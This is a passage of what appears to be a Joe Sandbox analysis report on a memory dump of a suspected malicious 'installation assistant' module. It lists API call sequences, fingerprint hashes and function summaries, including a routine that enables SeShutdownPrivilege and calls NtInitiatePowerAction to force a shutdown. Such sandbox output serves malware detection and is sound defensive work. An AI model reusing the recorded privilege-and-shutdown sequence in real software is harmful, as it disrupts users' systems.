                                        • GetFileType.KERNEL32(00000000), ref: 6CD22FB3
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD22FBD
                                        • __dosmaperr.LIBCMT ref: 6CD22FC6
                                        • CloseHandle.KERNEL32(00000000), ref: 6CD22FE6
                                        • CloseHandle.KERNEL32(6CD19EF0), ref: 6CD23133
                                        • GetLastError.KERNEL32 ref: 6CD23165
                                        • __dosmaperr.LIBCMT ref: 6CD2316C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: 8Q
                                        • API String ID: 4237864984-4022487301
                                        • Opcode ID: ffca626cffeb893052e9eeaf360e7edda48bf897049958c73ee7de9ebcfa760f
                                        • Instruction ID: 851a07f41053d9f2cbdc6569988301496e1ae7ba467ea0c1c7b604df2a0b87ea
                                        • Opcode Fuzzy Hash: ffca626cffeb893052e9eeaf360e7edda48bf897049958c73ee7de9ebcfa760f
                                        • Instruction Fuzzy Hash: 94A15632B141448FCF199F68C890BEE7BB4AB4732CF18015DE950EB7A0CB398816C7A1

                                        Control-flow Graph

                                        • Control-flow graph of the function at 6CCDB750 (the rendered graph is not preserved in this export): a large dispatcher of short blocks, most of which branch back to the common block at 6CCDB7E6. Win32 call in its blocks: CreateFileA (block 6CCDB8E7). Internal callees: 6CD05990, 6CD0A740, 6CCDA500, 6CD0A1C0, 6CCD18A0, 6CCD18B0, 6CCDC2C0.
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 1:x$1:x$wtU'$xtU'$xtU'
                                        • API String ID: 0-2932700092
                                        • Opcode ID: fd67055da992ab2e05ba2853e071c307d530eb85897099bd043cd333ccc0dbaf
                                        • Instruction ID: c45ba3e6034cd6aca64da01c71d878844fba931e2bfc91f4cdf48735c2139ebd
                                        • Opcode Fuzzy Hash: fd67055da992ab2e05ba2853e071c307d530eb85897099bd043cd333ccc0dbaf
                                        • Instruction Fuzzy Hash: 4F52237460D3829FC714CE29C4A062EBBE1BFCA214F26895EF595C7750E634E885CB63
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;T55
                                        • API String ID: 0-2572755013
                                        • Opcode ID: 21b39c83c38fc4ae6e7a1707f904b2c0bf9ffaa8e8e84b5ba613dd9fd20e4606
                                        • Instruction ID: ef66f9827c86a776ed4408243aad9e1c87b11e747c1df88c693b29c6f6548ec9
                                        • Opcode Fuzzy Hash: 21b39c83c38fc4ae6e7a1707f904b2c0bf9ffaa8e8e84b5ba613dd9fd20e4606
                                        • Instruction Fuzzy Hash: 3603D331645B818FC728CF28C8D0696B7E3EFD63247198B7DC0A64BA95DB74B44ACB50

                                        Control-flow Graph

                                        • Control-flow graph of the function at 6CD03E00 (the rendered graph is not preserved in this export): 7 basic blocks, 9 edges. Win32 calls in its blocks: CreateProcessA (entry block), then WaitForSingleObject and CloseHandle (called twice) in the block at 6CD03ED0. No internal callees.
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CloseHandle$CreateObjectProcessSingleWait
                                        • String ID: D
                                        • API String ID: 2059082233-2746444292
                                        • Opcode ID: 8d18c427c36df0d97f6ddb28370662387594c8db9d8558480021f16363ae8d53
                                        • Instruction ID: 2719b85aa7f7d2fe974d4a59bd0a0d7ed29b5105fdfbad803b0c8d00aabd8c11
                                        • Opcode Fuzzy Hash: 8d18c427c36df0d97f6ddb28370662387594c8db9d8558480021f16363ae8d53
                                        • Instruction Fuzzy Hash: E631E2B1A093808FD750DF28C19875ABBF0AB99308F505A1EF8D997260E775E584CF43

                                        Control-flow Graph

                                        • Control-flow graph of the function at 6CD1AA7E (the rendered graph is not preserved in this export). Win32 calls in its blocks: WriteFile, with GetLastError on the branch that follows it. Internal callees: 6CD0E7FF, 6CD0E7EC, 6CD0EF40, 6CD19A89, 6CD1AC60, 6CD1ACD1 (the subcall containing GetConsoleCP, per the APIs list below), 6CD1B07B, 6CD1B0E3, 6CD1B2A7, 6CD1B1BE, 6CD0E812.
                                        APIs
                                          • Part of subcall function 6CD1ACD1: GetConsoleCP.KERNEL32(?,6CD19EF0,?), ref: 6CD1AD19
                                        • WriteFile.KERNEL32(?,?,6CD2350C,00000000,00000000,?,00000000,00000000,6CD248D6,00000000,00000000,?,00000000,6CD19EF0,6CD2350C,00000000), ref: 6CD1ABCF
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CD2350C,6CD19EF0,00000000,?,?,?,?,00000000,?), ref: 6CD1ABD9
                                        • __dosmaperr.LIBCMT ref: 6CD1AC1E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                        • String ID: 8Q
                                        • API String ID: 251514795-4022487301
                                        • Opcode ID: 5192bb46a6004f624fdf19b856d3fa8a509bc536d5aaad8fd384c359400007cb
                                        • Instruction ID: defc84d7a504c72357058a677e1357891aeb528379f66634fbcdbf367daa24cc
                                        • Opcode Fuzzy Hash: 5192bb46a6004f624fdf19b856d3fa8a509bc536d5aaad8fd384c359400007cb
                                        • Instruction Fuzzy Hash: 91510775B08109EFDB01DFA8D980BEEBBBAEF06318F140555E558A7E61D730994887B0

                                        Control-flow Graph

                                        • Control-flow graph of the function at 6CD049B0 (the rendered graph is not preserved in this export): 10 basic blocks, 12 edges; no Win32 calls in its blocks. Internal callees: 6CBD01F0, 6CD0F938, 6CBD2250, 6CBD2340, 6CD08199, 6CBCE010, 6CD05EA8.
                                        APIs
                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CD04B51
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Ios_base_dtorstd::ios_base::_
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 323602529-1866435925
                                        • Opcode ID: 1e2a972718771418266516f415398f53111c1acefcb303e758254159179abeaf
                                        • Instruction ID: d75d42292306a0367c0c05b3fa42a0defe808b6c59b9cdf807f2a3437e8a45b4
                                        • Opcode Fuzzy Hash: 1e2a972718771418266516f415398f53111c1acefcb303e758254159179abeaf
                                        • Instruction Fuzzy Hash: E65125B5600B408FD725CF29C485B97BBF1BB58318F408A2DD9864BBA1D775B909CB90

                                        Control-flow Graph

                                        • Control-flow graph of the function at 6CCDC310 (the rendered graph is not preserved in this export). Win32 calls in its blocks: ReadFile (block 6CCDC36E) and WriteFile (blocks 6CCDC481, 6CCDC51D, 6CCDC5E6). Internal callees: 6CD05990, 6CD0A740, 6CD0A1C0.
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3070319616d89e20ef08552ecd97fa1213debab053e65dc2331ae8b12b728c74
                                        • Instruction ID: c9547c742962574628058f62b18ba450523b7b49114fd3b48a484c1d00b828cb
                                        • Opcode Fuzzy Hash: 3070319616d89e20ef08552ecd97fa1213debab053e65dc2331ae8b12b728c74
                                        • Instruction Fuzzy Hash: FD7168B0248305AFD700DF19C4807AEBBF4BF89718F51492EF699C6660E775E854CB92

                                        Control-flow Graph

                                        • Control-flow graph of the function at 6CD1A745 (the rendered graph is not preserved in this export): 13 basic blocks, 20 edges. Win32 calls in its blocks: CloseHandle (block 6CD1A793) and GetLastError (block 6CD1A7A5). Internal callees: 6CD203C2 (called from three blocks, twice in the block at 6CD1A77D), 6CD2053F, 6CD0E812.
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,6CD2307F), ref: 6CD1A79B
                                        • GetLastError.KERNEL32(?,00000000,?,6CD2307F), ref: 6CD1A7A5
                                        • __dosmaperr.LIBCMT ref: 6CD1A7D0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CloseErrorHandleLast__dosmaperr
                                        • String ID:
                                        • API String ID: 2583163307-0
                                        • Opcode ID: f3f4456a5c55f1d340a58f99d076eaee56507ca33e023ace0b64594da3283081
                                        • Instruction ID: 09807131cc3ff60c0a002ef63d8fc33e150a511ad3d9c9ba2e935e51eebaf968
                                        • Opcode Fuzzy Hash: f3f4456a5c55f1d340a58f99d076eaee56507ca33e023ace0b64594da3283081
                                        • Instruction Fuzzy Hash: 2001483270E16057C3102738A884BAD37785BC3B3CF29025DE91CC7EE2DB64994DC2A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8Q
                                        • API String ID: 0-4022487301
                                        • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                        • Instruction ID: 399fd4b238d9149d333a4a0018da45e5e028ee936ae9f6c748db0de9def8f89f
                                        • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                        • Instruction Fuzzy Hash: 5EF0D132B466106AD6215F3DAC407CA33A98F8233CF350715E86597FF0CB34D40A86B9
                                        APIs
                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CD048D4
                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CD04914
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Ios_base_dtorstd::ios_base::_
                                        • String ID:
                                        • API String ID: 323602529-0
                                        • Opcode ID: 637f0807786dfd0f3bd6c5aabe9e65a9477cea329382761b34d42c81ff9d8bb3
                                        • Instruction ID: f6a60ba66c996ba333853a49870980f1378e2edad54281eceadf777565f0ee44
                                        • Opcode Fuzzy Hash: 637f0807786dfd0f3bd6c5aabe9e65a9477cea329382761b34d42c81ff9d8bb3
                                        • Instruction Fuzzy Hash: 59513771201B40DBE725CF29C885BD6B7F4FB04718F448A1CE8AA47BA1DB30B549CB91
                                        APIs
                                        • GetLastError.KERNEL32(6CD34DD8,0000000C), ref: 6CD0DD72
                                        • ExitThread.KERNEL32 ref: 6CD0DD79
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorExitLastThread
                                        • String ID:
                                        • API String ID: 1611280651-0
                                        • Opcode ID: 02299aca2233620eb25bdce4f50e6e7ad07329ca338389ef78a544aacaffa03d
                                        • Instruction ID: 1134fcbd944564bae52952b03762b837fb834390af6f8af81668721aed2c03f1
                                        • Opcode Fuzzy Hash: 02299aca2233620eb25bdce4f50e6e7ad07329ca338389ef78a544aacaffa03d
                                        • Instruction Fuzzy Hash: 02F0C2B0B04204AFEB05AFB4D808AAE3B74FF42318F24418AE11597B61DB359915CBB1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __wsopen_s
                                        • String ID:
                                        • API String ID: 3347428461-0
                                        • Opcode ID: e613c7f5ca1c1a5821f7db8a0cebd83abbcdd8c908a77a635c39f8e2475d4897
                                        • Instruction ID: 62e94e86559746bee04bc0621346ee6bfc7c5caaebed904aa335c7f3a2613106
                                        • Opcode Fuzzy Hash: e613c7f5ca1c1a5821f7db8a0cebd83abbcdd8c908a77a635c39f8e2475d4897
                                        • Instruction Fuzzy Hash: 63114C71A0820AAFCF05CF58E94499F7BF8EF48318F144099F809AB351D771EA11CBA4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                        • Instruction ID: ddbe6597a1f57041cbdfbbee2a8b2060ffacf66fc793eeb671428548c8ec514f
                                        • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                        • Instruction Fuzzy Hash: 24018F72D11159AFCF019FA88C00AEE7FB5AF08218F104165FA24E2270E731CA24EB91
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,00000000,?,6CD22F35,?,?,00000000,?,6CD22F35,00000000,0000000C), ref: 6CD23294
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 1dc4df0e2ba61d073941a50798e277fbd93d561ceed29485c1fccfd167966bf2
                                        • Instruction ID: 5efc4ae7e00b3cb316350fdea82834434ef03dc951e382819c013ebb90e9396a
                                        • Opcode Fuzzy Hash: 1dc4df0e2ba61d073941a50798e277fbd93d561ceed29485c1fccfd167966bf2
                                        • Instruction Fuzzy Hash: 71D06C3210010DBBDF128E84EC06EDA3BAAFB48724F014000BA1856020C732E861AB91
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                        • Instruction ID: 3561ce658f392270edef963e555289e9d7fc34966949b6fca89ad09ea0ed5646
                                        • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                        • Instruction Fuzzy Hash:
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 6CD04B8A
                                        • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CD04B96
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CD04BA4
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CD04BCB
                                        • NtInitiatePowerAction.NTDLL ref: 6CD04BDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3256374457-3733053543
                                        • Opcode ID: 01ab4b02c4598d7edf76974cb249929f34ce9a70b6679d5fe29485843a33110f
                                        • Instruction ID: 4b5d985714dffff5d76ce52fce52788c7c92e8f4bf5ff48f4338d6e30e2982d7
                                        • Opcode Fuzzy Hash: 01ab4b02c4598d7edf76974cb249929f34ce9a70b6679d5fe29485843a33110f
                                        • Instruction Fuzzy Hash: 18F054B0744300AFEA006B24DD0EB5A7BF8EF65705F00495CFA45A61D1E77269A8CBE6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \j`7$\j`7$j
                                        • API String ID: 0-3644614255
                                        • Opcode ID: f0a58b631ea4c30c6d79a22ff67a5cf0128199e9ae34954cdacbe099336fa9bd
                                        • Instruction ID: e93c19c4678486d1ff5302764fb78371f965a2df9e73432625908d18db680053
                                        • Opcode Fuzzy Hash: f0a58b631ea4c30c6d79a22ff67a5cf0128199e9ae34954cdacbe099336fa9bd
                                        • Instruction Fuzzy Hash: 5842257460A3828FCB14CF68C49065ABBE1BBC9354F284A2EE4E9D7760D774D846CB53
                                        APIs
                                        Memory Dump Source
